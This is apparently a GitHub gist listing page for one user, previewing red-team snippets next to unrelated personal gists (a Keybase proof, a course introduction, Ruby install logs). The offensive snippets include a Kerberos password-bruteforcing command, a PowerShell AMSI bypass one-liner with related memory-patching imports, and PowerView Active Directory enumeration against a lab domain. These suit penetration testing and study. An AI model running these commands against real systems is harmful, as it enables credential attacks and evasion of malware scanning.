Skip to content

Instantly share code, notes, and snippets.

@reybango
reybango / kerberos_attacks_cheatsheet.md
Created March 5, 2024 04:10 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@reybango
reybango / gist:e3f979bb0ab4f93e5c60a9b6bc81849f
Created September 8, 2021 20:51
Type Accelerator Alias
$MethodDefinition = "
[DllImport(`"kernel32`")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport(`"kernel32`")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport(`"kernel32`")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
@reybango
reybango / PowerView-3.0-tricks.ps1
Created April 9, 2021 01:06 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
#Import a script into teh legacy Empire CLI
scriptimport ./data/module_source/situational_awareness/network/powerview.ps1
Then you can execute the commands with scriptcmd
# Pulled from https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70
# Description:
# Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
# AMSI Bypass (Matt Graeber)
Normal Version
------------------------
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Get all user objects in the specific domain and only print the AD username
get-netuser -domain throwback.local -domaincontroller 10.200.14.117 | select samaccountname
# Get all computer objects in the specific domain
get-netcomputer -domain throwback.local -domaincontroller 10.200.14.117
# Get all domain trusts
Get-NetDomainTrust -domain throwback.local -domaincontroller 10.200.14.117

Keybase proof

I hereby claim:

  • I am reybango on github.
  • I am reybango (https://keybase.io/reybango) on keybase.
  • I have a public key whose fingerprint is 3EB4 B311 8F42 7223 B9B0 EAB8 5E40 0313 D8F5 A86D

To claim this, I am signing this object:

@reybango
reybango / gist:5999755
Last active December 19, 2015 18:38
Bloc.io Intro

Intro time!

Hey all, my name is Rey Bango. Note it's spelled with an "e" since it's short for Reinaldo. I always go with Rey since everyone has a hard time pronouncing my full name. :)

I'm a developer evangelist at Microsoft focused on web development and Internet Explorer. I've been developing professionally for about 24 years in a variety of systems both non-web & web-based. I cut my chops on the web using ColdFusion several years ago and then shifted to client-side development where I eventually became part of the jQuery project team.

My main interest in this course is to get back into server-side development using a modern stack so I can round out my skills again. And hopefully the client-side stuff will be a nice refresher for me.

I'm also the dad to 5 kids and have a loving wife. :)

@reybango
reybango / gist:5205320
Created March 20, 2013 14:57
rvm install 1.9.3
Reys-MacBook-Air:~ rey$ rvm install 1.9.3
Searching for binary rubies, this might take some time.
No binary rubies available for: osx/10.8/x86_64/ruby-1.9.3-p392.
Continuing with compilation. Please read 'rvm mount' to get more information on binary rubies.
Installing requirements for osx/10.8/x86_64, might require sudo password
Skipping `brew update` make sure your formulas are up to date.
Skipping update of certificates in '/usr/local/etc/openssl/cert.pem'.
Installing Ruby from source to: /Users/rey/.rvm/rubies/ruby-1.9.3-p392, this may take a while depending on your cpu(s)...
ruby-1.9.3-p392 - #downloading ruby-1.9.3-p392, this may take a while depending on your connection...
ruby-1.9.3-p392 - #extracting ruby-1.9.3-p392 to /Users/rey/.rvm/src/ruby-1.9.3-p392
@reybango
reybango / gist:5204957
Created March 20, 2013 14:13
rvm install 1.9.3 --debug
Reys-MacBook-Air:~ rey$ rvm install 1.9.3 --debug
1.9.3 - install
Searching for binary rubies, this might take some time.
Remote file does not exist https://rvm.io/binaries/osx/10.8/x86_64/ruby-1.9.3-p392.tar.bz2
Remote file does not exist http://jruby.org.s3.amazonaws.com/downloads/ruby-1.9.3-p392.tar.bz2
Remote file does not exist http://binaries.rubini.us/osx/10.8/x86_64/ruby-1.9.3-p392.tar.bz2
rvm_remote_server_url3 not found
No remote file name found
No binary rubies available for: osx/10.8/x86_64/ruby-1.9.3-p392.
Continuing with compilation. Please read 'rvm mount' to get more information on binary rubies.